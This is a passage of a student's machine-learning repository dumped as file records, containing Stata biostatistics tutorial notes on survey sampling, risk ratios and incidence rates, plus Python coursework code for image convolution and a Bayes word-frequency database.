post:\r\nhttp://www.aiqus.com/questions/31667/source-code-used-for-ai-class\r\n\r\nhttps://bitbucket.org/les2/aiclass/src\r\n\r\nThere is the source code I used throughout the course. There are the following files:\r\n\r\n PixelAlignment.py - pixel correspondence from scan lines\r\n KMeans.py - k-means algorithm as well as guassian and multivariate guassian regressions\r\n Sched.py - task network scheduling\r\n Smooth.py - Laplacian smoother that also does Markov chains (e.g., 'ABBBAAABA', what's P(A followed by A)\r\n ValIter.py - value iteration algorithm for MDP / grid world; you can customize the actions allowed (e.g., N/S/E/W or NE/NW/SE/SW) and combine stochastic and deterministic actions; the state space is only two dimensions so it will not handle a heading\r\n LinearFilter.py - convolve and image with a kernel\r\n LinearRegression.py - linear regression (find the w0 and w1)\r\n\r\nI used these programs for the homeworks / exams, so they work for the examples in class. They're documented to varying degrees and typically includes pydoc tests (unit tests embedded in the documentation).\r\n\r\nI'm not a Python expert, so the code is definitely rough around the edges. Some of it is definitely quick-and-dirty. I like to think that the code because more 'pythonic' with time. Python is definitely way better than Java in terms of ease of use (and I say that as a Java expert).\r\n\r\nI use Python 2.6.5 in Cygwin, so I know that will work. Your mileage will vary with other versions of Python.\r\n\r\nFor the Python novices, use python -i {file name} to load one of the files in the Python REPL (read-evaluate-print-loop). That makes it easy to play around with the code.\r\n\r\nLet me know if you have problems getting started or if you have suggestions.\r\n\r\n===================\r\n You Might Need\r\n===================\r\n\tPython 2.6.5 Reference http://docs.python.org/release/2.6.5/\r\n\t\tStart here if you are new to Python. If there is something in the source code that you don't understand, try\r\n\t\tto find it in the reference. Check out the tutorials!\r\n\r\n\tCygwin http://www.cygwin.com/\r\n\t\tYou will need this if you are a Microsoft Windows user and want to do serious programming.\r\n\t\tThis is probably the EASIEST WAY TO INSTALL PYTHON ON WINDOWS. Cygwin allows you to install Python\r\n\t\tusing its installer.\r\n\r\n\tGVim http://www.vim.org/download.php\r\n\t\tThe best text editor on the planet (and possibly in the universe).\r\n\r\n" }, { "alpha_fraction": 0.731596827507019, "alphanum_fraction": 0.7361268401145935, "avg_line_length": 22.810810089111328, "blob_id": "da4fd3c5da113f5c1228ab73058f963487875504", "content_id": "161f1d9a113fca6afd6124af6619fa8d5352366d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 883, "license_type": "no_license", "max_line_length": 81, "num_lines": 37, "path": "/PH207x/excercises/Lesson7/Tutorial: Contingency Tables.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Contingency Tables #\n> *cs* - Cohort Study, estimate an Odds Ratio (OR), Pearson Chi-square \n> *tabulate* - Conduct a Pearson Chi-square test, R x C \n\n\tuse \"chis_healthdisparities.dta\", replace\n\ttabulate poverty doctor, row\n\ttabulate poverty doctor, row expected\n\n\tcs doctor poverty, or woolf\n\n\tgen nopoverty = 1-poverty\n\tcs doctor nopoverty, or woolf\n\n\n##Pearson Chi-square test##\n> **Step1:**\n\n\ttabulate poverty doctor, row expected\n\n> Look if all expected cell counts (expected frequency command) are higher than 5\n\n\tcs doctor poverty, or woolf\n\ttabulate poverty doctor, row expected chi2\n\n## Presenting Results ##\n> *Cohort Study*: Use the **Risk difference** \n> Never use the p-value to present the results.\n\n# Install R by C table addon for stata#\n\n\tssc install tabplot\n\n> Example:\n\n\ttabplot racecat poverty\n\ttabplot poverty racecat\n\ttabulate racecat pov, row\n\n\n" }, { "alpha_fraction": 0.6121336221694946, "alphanum_fraction": 0.6612133383750916, "avg_line_length": 27.134614944458008, "blob_id": "e0c0d705bb917b4cbebf0f16ad34345e0333d060", "content_id": "d64f7fee02a960689b978f56f51025f458f7195c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1467, "license_type": "no_license", "max_line_length": 201, "num_lines": 52, "path": "/PH207x/excercises/Lesson7/ Tutorial: One-sample proportions.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: One-sample proportions #\n\n## Confidence Intervals ##\n> *ci* and *cii* calculate **binomial confidence** intervals\n\n## Hypothesis Tests ##\n> *bitest* and *bitesti* **exact binomial** one-sample proportion hypothesis test \n> *prtest* and *prtesti* **large sample one sample** proportion hypothesis test\n\n### 1. We're going to do is estimate the proportion of California residents who visit the doctor at least once in the previous year. Lets denote this p. ###\n> For small samples use exact and for big samples use Wald methods. \n\n\tci doctor, binomial\n\tci doctor, binomial wald\n\tci doctor, binomial wilson\n\n\n#### Is it reasonable to use the wald interval? ####\n> n*p > 5 \n> 500*0.804= 402 \n> **So its higher than 5!** \n> **It is the easted to calculate, so we see this in reality very often**\n\n\n#### We'll look at these confidence intervals and decide whether there's evidence that at the 95% confidence level, do we think that at least 80% of the population visits the doctor once per year. ####\n\n> poverty level\n\n\tby poverty, sort : ci doctor, binomial\n\n\n> H_0: P_1= 0.8\n> H_A: P_1 != 0.8\n> alpha= 0.05\n\n\tbitesti 100 50 0.8\n\tbitest doctor == 0.8 if poverty==1\n\n### Look at the large sample test ###\n> At first we test if the binomial distribution is appropriate. \n> \n> n_1*P_1 > 5 \n> 63*0.8= 50.4 > 5 \n> \n> n_1(1-P_1) > 5 \n> 63*.2= 12.6 > 5 \n> \n> H_0: P_1= 0.8 \n> H_A: P_1 != 0.8 \n> alpha= 0.05 \n\n\tprtest doctor == 0.8 if poverty==1\n\n\n\n\n" }, { "alpha_fraction": 0.6010042428970337, "alphanum_fraction": 0.6701428890228271, "avg_line_length": 54.04255294799805, "blob_id": "2673a12ec87b66d4b75ee7d889adb6e79991abc5", "content_id": "2b636e52e9462fa8c2509d6a47a8e84bf18f133e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2617, "license_type": "no_license", "max_line_length": 885, "num_lines": 47, "path": "/PH207x/homework/four/Titanic Survival Risk Ratios.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Titanic Survival Risk Ratios \nThe following table describes the survival status of passengers on the Titanic, stratified by Passenger Class (First, Second, or Third), Sex/Age (Child, Women, or Man), and Survival Status. The Frequency column indicates the number of passengers in each stratum. (For example there were 4 1st class women passengers who did not survive and 140 1st class women passengers who did survive). These data were obtained from the website anesi.com and refers to British Parliamentary Papers, Shipping. Casualties (Loss of the Steamship “Titanic”), 1912. cmd 6352 “Report of a Formal Investigation into the circumstances attending the foundering on the 15th April 1912 of the British Steamship “Titanic” of Liverpool after striking ice in or near Latitude 41 46 N., Longitude 50 14 W., North Atlantic Ocean, whereby loss of life ensued (London; His Majesty’s Stationary Office, 1912) page 42. \n\nPassenger Class | Age/Sex | Survival Status | Frequency\n--------------- | ------- | --------------- | -----------\nFirst | Child | Survived | 6\nFirst | Child | Did not survive | 0\nFirst | Woman | Survived | 140\nFirst | Woman | Did not survive | 4\nFirst | Man | Survived | 57\nFirst | Man | Did not survive | 118\nSecond | Child | Survived | 24\nSecond | Child | Did not survive | 0\nSecond | Woman | Survived | 80\nSecond | Woman | Did not survive | 13\nSecond | Man | Survived | 14\nSecond | Man | Did not survive | 154\nThird | Child | Survived | 27\nThird | Child | Did not survive | 52\nThird | Woman | Survived | 76\nThird | Woman | Did not survive | 89\nThird | Man | Survived | 75\nThird | Man | Did not survive | 387\n\n##### Q1. Use these data to calculate the Risk Ratio for surviving comparing “women or children” as the exposed group and “all other passengers” as the non-exposed group. #####\n\n>\tSurviving Risk Ratio= ?\n\n> | Died | Surviving | Total | Estimated Risk\n> ------------------ | ---- | --------- | ----- | ------------------\n> Women or children | 158 | 353 | 511 | 353/511= 0.69080235\n> All other | 659 | 146 | 805 | 146/805= 0.18136646\n\n>\tRisk Ratio: RR= 0.69080235 / 0.18136646= **3.808876**\n\n\n\n##### Q2. Use these data to calculate the Risk Ratio for surviving comparing “women or children” as the exposed group and “all other passengers” as the non-exposed group for each passenger class. #####\n\n###### a) First Class ######\n>\tSurviving Risk Ratio= **2,9883040936**\n\n###### b) Second Class ######\n>\tSurviving Risk Ratio= **10,6666666667**\n\n###### c) Third Class ######\n>\tSurviving Risk Ratio= **2,6003278689**\n\n\n" }, { "alpha_fraction": 0.4514550566673279, "alphanum_fraction": 0.544681966304779, "avg_line_length": 58.67692184448242, "blob_id": "191901e6cb5166ff4dcb8ae0d3b8a078ce2ff368", "content_id": "3d73512d33d06d5f98a910c6cb2db178820eda14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3883, "license_type": "no_license", "max_line_length": 422, "num_lines": 65, "path": "/PH207x/excercises/Lesson9/Stata Demo Module 9.1 - Age-adjusted Incidence Rate.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Stata Demo Module 9.2: Age-adjusted Incidence Rate ##\n* Calculate the crude incidence rate ratio of CHD for smokers compared to nonsmokers in Stata\n* Calculate the age-adjusted incidence rate ratio of CHD for smokers compared to nonsmokers in Stata\n\n> Outcome like CHD we want to use incident rate ratios and incidence rates instead of risks or risk ratios. The issue with an outcome like CHD is that we might not have complete follow up for everyone. They may have dropped out of the study or suffered a competing risk before we could observe whether or not they developed CHD. \n> Because of this we're just going to use person-time. We have the amount of time that someone was followed for CHD, and we'll use the person-time and the number of CHD cases to calculate incidence rate ratios.\n\n#### So now let's go to Stata and calculate the crude incidence rate ratio of CHD #####\n\n```stata\n\tuse \"framingham_dataset.dta\"\n\tir anychd cursmoke1 timechd\n```\n\n```stata\n | Current smoker, exam 1 |\n | Exposed Unexposed | Total\n-----------------+------------------------+------------\nIncident Hosp MI | 617 623 | 1240\nTime [years] to | 39636.77 41288.39 | 80925.16\n-----------------+------------------------+------------\n | |\n Incidence rate | .0155664 .015089 | .0153228\n | |\n | Point estimate | [95% Conf. Interval]\n |------------------------+------------------------\n Inc. rate diff. | .0004774 | -.0012292 .002184 \n Inc. rate ratio | 1.031637 | .9214548 1.154975 (exact)\n Attr. frac. ex. | .0306665 | -.0852404 .1341806 (exact)\n Attr. frac. pop | .0152591 |\n +-------------------------------------------------\n (midp) Pr(k>=617) = 0.2917 (exact)\n (midp) 2*Pr(k>=617) = 0.5835 (exact)\n```\n\n> **The incidence rate ratio in this study is 1.03. That means that people who smoke have 1.03 times the rate of developing CHD compared to nonsmokers.**\n\n### Age-adjusted incidence rate ratio of CHD ###\n\n```stata\n\tgen age4cat=.\n\treplace age4cat=0 if (age1<=40)\n\treplace age4cat=1 if (age1>40 & age1 <=50)\n\treplace age4cat=2 if (age1>50 & age1 <=60)\n\treplace age4cat=3 if (age1>60 & age1 < .)\n\n\tir anychd cursmoke1 timechd, by(age4cat)\n```\n\n```stata\n age4cat | IRR [95% Conf. Interval] M-H Weight\n-----------------+-------------------------------------------------\n 0 | 1.270157 .8685574 1.879063 25.9039 (exact)\n 1 | 1.340651 1.084671 1.662353 79.13065 (exact)\n 2 | 1.280713 1.057269 1.549966 95.51036 (exact)\n 3 | 1.205179 .9301212 1.552003 54.86073 (exact)\n-----------------+-------------------------------------------------\n Crude | 1.031637 .9214548 1.154975 (exact)\n M-H combined | 1.281988 1.142602 1.438378\n-------------------------------------------------------------------\n Test of homogeneity (M-H) chi2(3) = 0.42 Pr>chi2 = 0.9362\n```\n\n> And this age-adjusted incidence rate ratio is right there, and it's 1.28. This means that after adjusting for age, people who are smokers have 1.28 times the rate of developing CHD compared to people who are nonsmokers. Now you can see that there's a pretty big difference in the incidence rate ratios between the crude incidence rate ratio which is 1.03, and the Mantel-Haenszel age adjusted rate ratio which is 1.28. \n> So this does support that there probably was some confounding by age. Because after we adjusted for age we're getting an effect estimate that is closer to the truth.\n\n\n\n\n" }, { "alpha_fraction": 0.3766954243183136, "alphanum_fraction": 0.5018495917320251, "avg_line_length": 26.964284896850586, "blob_id": "5d584d61f560ce10ae340a62e31c24081b939565", "content_id": "dbcdf40d7bfe879f0683419cd514fffd770edbfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1622, "license_type": "no_license", "max_line_length": 96, "num_lines": 56, "path": "/AI-Class/Algorithms-Python/LinearFilter.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "\"\"\"Computer vision related stuff for Unit 16.\"\"\"\r\n\r\ndef dims(matrix):\r\n\tif not matrix:\r\n\t\treturn (0, 0)\r\n\trows = len(matrix)\r\n\tassert rows > 0, \"impossible? rows <= 0: \" + rows\r\n\treturn (rows, len(matrix[0]))\r\n\r\ndef convolve(image, kernel):\r\n\t\"\"\"Convolves the image with the kernel as shown in Unit 16-19 \r\n\tand returns the result, that is, implements the linear filter \r\n\talgorithm from 16-21:\r\n\r\n\tI'(x,y) = Sum( I(x - v, y - v) * g(u, v) for all u and v )\r\n\twhere I is the input image, I' is the output, and g is the\r\n\tkernel which is applied to I.\r\n\r\n\t>>> convolve([[255, 212, 7, 1, 3], [211, 237, 3, 9, 0]], [[1, -1]])\r\n\t[[43, 205, 6, -2], [-26, 234, -6, 9]]\r\n\r\n\t>>> convolve([[255,7,3],[212,240,4],[218,216,230]], [[-1, 1]])\r\n\t[[-248, -4], [28, -236], [-2, 14]]\r\n\r\n\t>>> convolve([[12, 18, 6],[2, 1, 7],[100, 140, 130]],[[-1],[1]])\r\n\t[[-10, -17, 1], [98, 139, 123]]\r\n\r\n\t>>> m = [[50, 67, 80],[255, 10, 2],[73, 86, 11]]\r\n\t>>> k = [[1, 0, -1], [2, 0, -2], [1, 0, -1]]\r\n\t>>> convolve(m, k)\r\n\t[[538]]\r\n\t>>> convolve(k, m)\r\n\t[[538]]\r\n\t>>> k = [[0, 0, 0, 0, 0],[0, 1, 0, -1, 0], [0, 2, 0, -2, 0], [0, 1, 0, -1, 0], [0, 0, 0, 0, 0]]\r\n\t>>> convolve(k, m)\r\n\t[[182, 377, -182], [173, 538, -173], [144, 193, -144]]\r\n\t\r\n\t\"\"\"\r\n\tl, k = dims(image)\r\n\tn, m = dims(kernel)\r\n\r\n\tnum_rows = l - n + 1\r\n\tnum_cols = k - m + 1\r\n\tresult = []\r\n\tfor i in xrange(num_rows):\r\n\t\trow = [None]*(num_cols)\r\n\t\tfor j in xrange(num_cols):\r\n\t\t\trow[j] = sum([ (kernel[u][v]*image[i+u][j+v]) \\\r\n\t\t\t\t\tfor u in xrange(n) \\\r\n\t\t\t\t\t\tfor v in xrange(m) ])\r\n\t\tresult.append(row)\r\n\treturn result\r\n\r\nif __name__ == '__main__':\r\n\timport doctest\r\n\tdoctest.testmod()\r\n" }, { "alpha_fraction": 0.6576244831085205, "alphanum_fraction": 0.6848927140235901, "avg_line_length": 38.213890075683594, "blob_id": "90c815f887853f72066104959586f6d7f05cf353", "content_id": "60ab46f3bf881343f499f89f47b3184b33214391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 14119, "license_type": "no_license", "max_line_length": 687, "num_lines": 360, "path": "/PH207x/excercises/Lesson8/Survey Data Analysis.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Sampling Methods ##\nSeveral Sampling methods:\n\n* Simple Random Sampling (SRS) \n* Stratified Sampling \n* Cluster Sampling \n* Stratified Cluster Sampling\n\n### Design Effect ###\nDesign Effect (DEFF) is the ratio of the variance under the design used, to the variance with simple random sampling. e.g. DEFF=2 means you need twice as big a sample to get the same variance as you would get with a simple random sample.\n\n## Tutorial: Survey Designs ##\n> Real-world, publicly available survey data is often very complex. Consequently, we will use \"hypothetical\" data for all of the tutorials in this week's tutorial sequence, estimating p, the prevalence of a disease, say malaria, in a hypothetical country, called Inventia.\n\nProvince | Population size | Number of districts\n-------- | --------------- | --------------------\n 1 | 225000 | 50\n 2 | 150000 | 42\n 3 | 100000 | 32\n 4 | 25000 | 23\n Total | 500000 | 146\n\n> We know that p differs between different provinces, due to the different hypothetical climates in each area. p may also vary somewhat between districts, given different access to malaria prevention. For instance, urban populations may have more resources to prevent malaria, and thus a lower prevalence. The true prevalence of malaria in Inventia is 13.1%. \n> \n> In the following tutorial, we examine how to analyze data from several different survey designs: \n\n* Simple random sampling (SRS) - We randomly sample 1,000 people.\n* Stratified Sampling - We randomly sample 250 people from each of the 4 provinces of Inventia.\n* Cluster Sampling - We randomly sample 25 districts from Inventia and randomly sample 40 people within each district.\n* Stratified Cluster sampling - Within each of the 4 provinces, we sample 5 districts and sample 50 people within each selected district.\n\n> **Discuss the advantages and disadvantages of these survey designs, considering ease of implementation, c ost, feasibility, and precision of your estimate. Which design would you do in practice?** \n> \n> This is an open-ended question, without a definitive correct answer. Please discuss your answers below on the discussion boards.\n\n#### Answer (Some thoughts (this is not a comprehensive list/answer!) ####\n> Stratified sampling protects against obtaining a bad simple random sample (e.g. by chance, sample all males); and facilitates subgroup estimation (e.g. sample equal numbers from each province by design, so that you can compare estimates between provinces). Further, if your survey is well designed and you use auxillary information, stratified sampling is the most effcient survey design, beating out simple random sampling. However, to implement stratified sampling, we need auxilliary information to increase precision (variance within strata); and need to know the population-size within each stratum. \n> \n> Cluster sampling is typically more convenient (usually way easier to implement when doing large-scale surveys than SRS or stratified sampling). However, this convenience results in a loss of efficiency (need to sample more people to obtain same precision as an SRS). We also need auxillary information about population size within each cluster.\n\n## Tutorial: Survey Data Analysis in Stata: Simple Random Sampling ##\n> We aim to estimate p, the prevelance of malaria, in a hypothetical country, called \"Inventia\", with four provinces and multiple districts within provinces.\n\n> **Surveys:**\n\n* Simple Random Sampling (SRS) \n* Stratified Sampling \n* Cluster Sampling \n* Stratified Cluster Sampling\n\n\n\tuse \"srs_sampling.dta\"\n\n\n> **Before analyzing, *svyset* your data!**\n\n1. What is the design of my survey?\n2. Am I using a finite population correction? At which stage of the design?\n3. What are the survey weights used in the design?\n\n### Simple Random Sampling (SRS) ###\n\n> N=pop_size=500000 \n> n=sample_size=1000 \n> p=?\n\n> q= 1000/500000 \n> w= 50000/1000 \n> f=1-n/N -> But Stata don't use it -> Look at fpc \n> fpc=final_pop_correction=n/N\n\n\tgen sample_size=1000 \n\tgen weight_srs=pop_size/sample_size \n\tgen fpc=sample_size/pop_size \n\tsvyset id [pweight = weight_srs], fpc(fpc)\n\n> Result:\n\n Parameter | Value\n-------------- | ------------\n pweight: | weight_srs\n VCE: | linearized\n Single unit: | missing\n Strata 1: | \\<one\\>\n SU 1: | id\n FPC 1: | fpc\n\n\n\tsvy: proportion malaria\n\n> Without fpc, the confidence interval is changing and the proportion of svy is the same\n\n\tsvyset id [pweight = weight_srs] \n\tsvy: proportion malaria \n\tproportion malaria\n\n> So, please use fpc and use extract the design effect: \n> deff= var(your current design) / var(SRS infinite large population)\n\n\tsvyset id [pweight = weight_srs], fpc(fpc) \n\tsvy: proportion malaria \n\testat effects, deff\n\n\tsvy, sub(if province == 1): proportion malaria\n\tsvy, sub(if province == 2): proportion malaria\n\tsvy, sub(if province == 3): proportion malaria\n\tsvy, sub(if province == 4): proportion malaria\n\n\n### Stratified Sampling ###\n\nProvince | Sample People\n-------- | --------------\n 1 | 250\n 2 | 250\n 3 | 250\n 4 | 250\nTotal | 1000\n\n> strata=provinces \n> survey weights=?\n\n#### What's the probability of a random individual, in say,province two being selected. ####\n> For province two, it's just going to be 250 divided by the population's size of province two.\n\n> sample_size=250 \n> weight=sample_size/pop_size_of_province_2 \n> fpc=final_pop_correction=n/N\n\n\tuse \"stratified_sampling.dta \n\tgen sample_size=250 \n\tgen weight_stratified=pop_size/sample_size \n\tgen fpc_stratified=1/weight_stratified \n\tsvyset id [pweight = weight_stratified], strata(province) fpc(fpc_stratified)\n\n> Result:\n\n Parameter | Value\n-------------- | ------------\n pweight: | weight_stratified\n VCE: | linearized\n Single unit: | missing\n Strata 1: | province\n SU 1: | id\n FPC 1: | fpc_stratified\n\n\n\tsvy: proportion malaria \n\testat effects, deff\n\n> Check Oversize:\n\n\tsvy: proportion malaria, over(province)\n\ttable prov_size\n\n\n### Cluster Sampling ###\n> 2 Stage Design of a Cluster survey\n\nProvince | District |Sample People\n-------- | -------- | --------------\n 1 | 1 | 20\n 1 | 2 | 10\n 1 | 3 | 2\n 1 | .. | ..\n 2 | .. | ..\n 3 | .. | ..\n 4 | .. | ..\nTotal | 2346 | 1000\n\n> We are doing: \n> 25 districts by randomly sampling \n> 40 people/district by randomly sampling \n> fpc_I=25/146 \n> fpc_II=40/people_in_district \n> \n> P(district 4 is sampled)= ?= fpc_I \n> P(Joe | disctrict 4 is sampled)= ?= fpc_II\n\n\tuse \"cluster_sampling.dta\"\n\tgen fpc_I=25/146\n\tgen fpc_II=40/districtsize\n\n\tgen weight_cluster=(fpc_I*fpc_II)^-1\n\tsvyset district [pweight=weight_cluster], fpc(fpc_I) || id, fpc(fpc_II)\n\n\tsvy: proportion malaria\n\testat effects, deff\n\n\n### Stratified Cluster ###\n\nProvince | District |Sample People\n-------- | -------- | --------------\n 1 | 1 | 20\n 1 | 2 | 10\n 1 | 3 | 2\n 1 | 4 | ..\n 1 | 5 | ..\n 1 | .. | ..\n 2 | 1 | ..\n 2 | 2 | ..\n 2 | 3 | ..\n 2 | 4 | ..\n 2 | 5 | ..\n 2 | .. | ..\n 3 | 1 | ..\n 3 | 2 | ..\n 3 | 3 | ..\n 3 | 4 | ..\n 3 | 5 | ..\n 3 | .. | ..\n 4 | 1 | ..\n 4 | 2 | ..\n 4 | 3 | ..\n 4 | 4 | ..\n 4 | 5 | ..\n 4 | .. | ..\nTotal | 2346 | 1000\n\n\n\tuse \"stratifiedcluster_sampling.dta\"\n\n\n> Example: Bob lives in district 2 of province 2 \n> 5/ #district in P2 -> 50/#people in district 2 \n> is equal to 5/fpc_I -> 50/fpc_II \n> \n> weights= (fpc_I * fpc_II)^-1 \n> ndistrict= total number of districts\n\n\tgen fpc_I=5/ndistrict\n\tgen fpc_II=5/districtsize\n\n\tgen weight_stratcluster=(fpc_I*fpc_II)^-1\n\tsvyset district [pweight=weight_stratcluster], fpc(fpc_I) strata(province)|| id, fpc(fpc_II)\n\n\tsvy: proportion malaria\n\testat effects, deff\n\n## Other Aspects of Survey Design ##\n> A survey weight for a given individual is the inverse of the probability that this person is included in the survey. Survey weights are therefore a function of the sample size and the size of the population from which you sample. Think about the sampling designs we discussed in class and the definition of a survey weight to answer the questions below. \n> \n> Suppose you have a population that can be divided into different subpopulations (strata/clusters). What auxiliary information is always required to calculate survey weights for the following types of designs:\n\n#### A simple random sample? ####\n\n* => **total population size**\n* population size within strata \n* population size within clusters \n* none of the above \n\n\n#### Stratified random sample? ####\n\n* total population size \n* => **population size within strata**\n* population size within clusters \n* none of the above \n\n#### Cluster sample? ####\n\n* total population size \n* population size within strata \n* => **population size within clusters**\n* none of the above \n\n## Answer ##\n> A survey weight for individual is the inverse probability that the individual is included in the sample. To calculate survey weights for a simple random sample, you need to know the total population size, because the weights are defined as the total number in the sample, divided by the total population size (though everyone in the sample has the same weight, so the weights don't actually impact your analysis). For a stratified sample, the weights are defined as the sample size per strata, divided by the population size in a strata. Therefore, you need to know the population size within strata. And for a cluster sample, you need to know the population size within each cluster. \n\n\n# Examining the Results of Stata Data Analysis #\n> The results of each of the surveys are below. \n\n Survey Designs | ^p | se(^p) | 95% CI | DEFF \n------------------- | ----- | ------ | ------------- | ---- \n Truth | 0.131 | | | \n SRS | 0.128 | 0.0106 | (0.107,0.149) | 1\n Stratified | 0.131 | 0.0120 | (0.107,0.155) | 1.28\n Cluster | 0.144 | 0.0142 | (0.115,0.173) | 1.63\n Stratified Cluster | 0.155 | 0.0145 | (0.125,0.186) | 1.61\n\n> Summary of our estimate of p from each of the survey designs.\n\n* Examining these results, compare and contrast the survey designs again.\n* Stratified sampling can be more efficient than simple random sampling. Looking at the design effects, we see that this is not the case for our survey design. Why?\n* Relatedly, how might we design a stratified survey that is more efficient than the simple random sample?\n\n## Answer Some thoughts (this is not a comprehensive answer) ##\n> Recall that we designed our survey such that we sample the same number of people in each province. More efficient designs would exploit: \n\n1. the total population size in each strata, and \n2. the amount of variability in responses in each strata. \n\n> When there is more variability within strata, you should sample more people. Ideally, we would select strata that minimize the within-strata variability to gain efficiency over SRS. The cluster or stratified-cluster surveys might be easier to implement in practice. Looking at the design effect estimates (as well as the standard error of our estimate of malaria prevalence), it is clear that we do sacrifice some efficiency by using cluster sampling. \n\n\n# Tutorial: The Perils of Non-response #\n> Calculate p with people who came back to the test\n\n1. High responses - pA\n2. Moderate responses - pB\n3. Low responses - pC\n\n> 'proportion highchol highcholC highcholB highcholA' is using only the data which are not missing. That is the reason why Number of obs is only 58.\n\n\n\tuse \"FraminghamNonresponseExample.dta\"\n\tproportion highchol highcholC highcholB highcholA\n\n\n\tgen wA=1/pA\n\tproportion highcholA [pweight=wA]\n\n\tgen wB=1/pB\n\tproportion highcholB [pweight=wB]\n\n\tgen wC=1/pC\n\tproportion highcholC [pweight=wC]\n\n\n# Example: Big Surveys #\n> A Survey design combines many elements:\n\n* Statistics\n* Epidemiology\n* Psychology/linguistics\n* Business/management/operations\n\n## Demographic Health Surveys (AIS Survey)##\nTanzania 2007-2008 Standard AIDS Indicator Survey (THMIS 2007-08)\n\n* **Objectives** \nThe objectives gives us a lot of informations: \"the primary objectives of the 2007-08 THMIS were to provide up-to-date information on the *prevalence of HIV infection* among **Tanzanian adults** and the prevalence of *malaria infection and anaemia* among **young children**.\" - Goals: adults and young children\n* **Sampling Frame** \nPreexisting sampling frame, developed by the National Bureau of Statistics for 2002 census\n* **Sampling Design** \nMultistage cluster sampling design, enumeration areas + households\n\n### Elements of Survey Design ###\n* **Modalities** \nIn person household and individual questionairres, blood samples\n* **Content** \nHousehold information, knowledge of HIV, demographics, HIV status, anemia/malaria status for children\n* **Non-response** \nMultiple levels of non-response: household, individual testing\n\n### How are all of these elements of design interrelated? ###\n\n* Objectives - designed\n* Modalities - non-response\n\n\n## California Health Interview Survey 2009 (CHIS) ##\n> It is completed different from the example above. \n> CHIS is the nation's largest state health survey. CHIS is a randomdial telephone survey conducted on a contrinuous basis and covering a wide range of health topics. CHIS data gives a detailed picture of the health and health care needs of California's large and diverse population. A full CHIS data cycle takes two years to complete and surveys over 50000 Californians but continous data collection now allows CHIS to generate one-year estimates. Link: http://www.chris.ucla.edu/about.html\n\n* Stratified random sample\n* Use random digit dialing for landlines and some cell phones\n* Much lower response rates\n\n\n" }, { "alpha_fraction": 0.5339961647987366, "alphanum_fraction": 0.5368826389312744, "avg_line_length": 31.13401985168457, "blob_id": "c14ac05b8fa513dfb9cf9b5e7f11ed8a2d4227b8", "content_id": "6f4cb03afb1fabe47f37c6acf6ae502b5c76e694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3118, "license_type": "no_license", "max_line_length": 76, "num_lines": 97, "path": "/AI-Class/Algorithms-Python/BayesFilter/BayesDB.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "class BayesDB:\n\n ## **************\n ## *** Fields ***\n ## **************\n\n ## Frequency tables and related book-keeping\n wordToTotalFreq = None\n labelToWordToFreq = None\n labelToTotalWordCount = None\n uniqueWords = None\n totalWordCount = None\n uniqueWordCount = None\n\n ## Docs/Labels DB\n allDocs = None\n labelToDocs = None\n\n ## **********************\n ## *** Public Methods ***\n ## **********************\n\n def addDoc(self, doc, label):\n \"\"\"\n Adds a doc (just a string) to the DB. Label is optional (if this\n doc is not labelled then just pass None). Calling this method will\n update the probabilities according to the words in the document, and\n the presence/absence of a label.\n \"\"\"\n self.allDocs.append(doc)\n\n for word in doc.split():\n self.__addWord(word)\n\n if label:\n self.__labelDoc(label, doc)\n\n def info(self):\n \"\"\"\n Prints info on this DB.\n \"\"\"\n print \"Word->Total Freq: %s\" % self.wordToTotalFreq\n print \"Label->Word->Freq: %s\" % self.labelToWordToFreq\n print \"Label->Total Word Count: %s\" % self.labelToTotalWordCount\n print \"Unique Words: %s\" % self.uniqueWords\n print \"Total Word Count: %s\" % self.totalWordCount\n print \"Unique Word Count: %s\" % self.uniqueWordCount\n print\n\n ## ***********************\n ## *** Private Methods ***\n ## ***********************\n\n def __init__(self):\n self.wordToTotalFreq = {}\n self.labelToWordToFreq = {}\n self.labelToTotalWordCount = {}\n self.uniqueWords = set([])\n self.totalWordCount = 0\n self.uniqueWordCount = 0\n\n ## Docs/Labels DB\n self.allDocs = []\n self.labelToDocs = {}\n\n def __labelDoc(self, label, doc):\n ## Init label->docs if not already seen\n if label not in self.labelToDocs.keys():\n self.labelToDocs[label] = []\n self.labelToDocs[label].append(doc)\n\n for word in doc.split():\n ## Initialise label->word->freq if not already seen\n if label not in self.labelToWordToFreq.keys():\n self.labelToWordToFreq[label] = {}\n\n ## Increment word frequency for this label\n if word not in self.labelToWordToFreq[label].keys():\n self.labelToWordToFreq[label][word] = 1\n else:\n self.labelToWordToFreq[label][word] += 1\n\n ## Increment total word count for this label\n if label not in self.labelToTotalWordCount.keys():\n self.labelToTotalWordCount[label] = 1\n else:\n self.labelToTotalWordCount[label] += 1\n\n def __addWord(self, word):\n if word not in self.wordToTotalFreq:\n self.wordToTotalFreq[word] = 1\n else:\n self.wordToTotalFreq[word] += 1\n \n self.uniqueWords.add(word)\n self.uniqueWordCount = len(self.uniqueWords)\n self.totalWordCount += 1\n\n" }, { "alpha_fraction": 0.6104529500007629, "alphanum_fraction": 0.6439024209976196, "avg_line_length": 40.565216064453125, "blob_id": "3c6e725520e6a96a451e2890f8a6b04a5391ed58", "content_id": "57b73844c34b04d57c9b51699ac8b546b1188574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2870, "license_type": "no_license", "max_line_length": 495, "num_lines": 69, "path": "/PH207x/homework/nine/Nonparametric Tests.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": 